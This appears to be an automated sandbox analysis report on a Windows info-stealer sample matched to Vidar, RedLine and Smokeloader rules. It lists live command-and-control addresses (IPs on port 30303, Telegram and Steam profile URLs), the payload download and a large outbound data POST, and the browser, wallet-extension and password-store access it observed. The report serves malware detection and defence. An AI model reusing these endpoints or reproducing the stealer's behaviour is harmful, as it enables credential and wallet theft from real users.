Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416770 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,	0_2_00416770
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00409F60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00409F60

Source: C:\Users\user\Desktop\06625899.exe

0_2_0040D1C0

Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199508624021
Source: Malware configuration extractor	URLs: https://t.me/looking_glassbot

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.34.154.187 188.34.154.187
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /667e85c8112da056f901292caf82b3ed HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
Source: global traffic	HTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0606627400761024User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 143185Connection: Keep-AliveCache-Control: no-cache

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.3:49685 -> 188.34.154.187:30303

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.46.113
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.46.113
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.46.113
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187

Source: 06625899.exe, 00000000.00000003.402473646.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303//
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/667e85c8112da056f901292caf82b3ed
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/667e85c8112da056f901292caf82b3edZ5
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/:
Source: 06625899.exe, 00000000.00000002.413121737.00000000031BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/CVOHV.xlsx
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/T
Source: 06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/addon.zip
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/addon.zip&u;y
Source: 06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/addon.zip0
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/addon.zip=u&y
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/e5
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/n
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303;
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113/667e85c8112da056f901292caf82b3ed
Source: 06625899.exe, 00000000.00000002.412555113.00000000008CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113/667e85c8112da056f901292caf82b3ed8
Source: 06625899.exe, 00000000.00000002.412555113.00000000008CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113/667e85c8112da056f901292caf82b3edx
Source: 06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113:80
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113:80/
Source: 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113:80peppppzxc.ziphttps://t.me/looking_glassbotlookataddon.zipMozilla/5.0
Source: 06625899.exe, 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113:8A
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.402473646.0000000000900000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsup30303/667e85c8112da056f901292caf82b3ed
Source: 06625899.exe, 00000000.00000002.423731237.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 50764714324176067669882221.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 50764714324176067669882221.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 50764714324176067669882221.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 50764714324176067669882221.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: 06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199508624021
Source: 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199508624021openopen_NULL%s
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/V
Source: 06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.402473646.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.402473646.0000000000900000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/looking_glassbot
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/looking_glassbotC
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/looking_glassbotJ
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: t.me

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_00414330 StrCmpCA,GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00414330

Source: global traffic	HTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /667e85c8112da056f901292caf82b3ed HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
Source: global traffic	HTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49684 version: TLS 1.2

Creates a DirectInput object (often for capturing keystrokes)

Source: 06625899.exe, 00000000.00000002.412477321.000000000082A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown

Uses 32bit PE files

Source: 06625899.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23

Detected potential crypto function

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00428C70	0_2_00428C70
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043C00E	0_2_0043C00E
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_004051A0	0_2_004051A0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042B366	0_2_0042B366
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042A379	0_2_0042A379
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043C55F	0_2_0043C55F
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042A80E	0_2_0042A80E
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00426810	0_2_00426810
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00426838	0_2_00426838
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043BABD	0_2_0043BABD
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042ABAC	0_2_0042ABAC
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00405C40	0_2_00405C40
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00405C68	0_2_00405C68
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043DC7F	0_2_0043DC7F
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00407C20	0_2_00407C20
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043CC3B	0_2_0043CC3B
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00407C9E	0_2_00407C9E
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042CDD0	0_2_0042CDD0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00406E10	0_2_00406E10
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00426EB0	0_2_00426EB0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042AF7E	0_2_0042AF7E

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\06625899.exe	Code function: String function: 0042BD10 appears 116 times
Source: C:\Users\user\Desktop\06625899.exe	Code function: String function: 004014E0 appears 540 times
Source: C:\Users\user\Desktop\06625899.exe	Code function: String function: 00433750 appears 44 times

Source: 06625899.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 06625899.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\06625899.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/4@1/3

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0041F170 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

0_2_0041F170

Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 36067264576515806059430256.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0041F040 CreateToolhelp32Snapshot,Process32First,Process32Next,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,Process32Next,CloseHandle,

0_2_0041F040

Source: C:\Users\user\Desktop\06625899.exe	Command line argument: The	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Greal	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: (Llangollen)	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: was	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: 19th-century	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Welsh-language	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: periodical	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: first	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: published	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: William	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Williams	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Llangollen	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: 1852	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Ebenezer	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: was	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Independent	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: chapel	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Inkerman	0_2_00410940
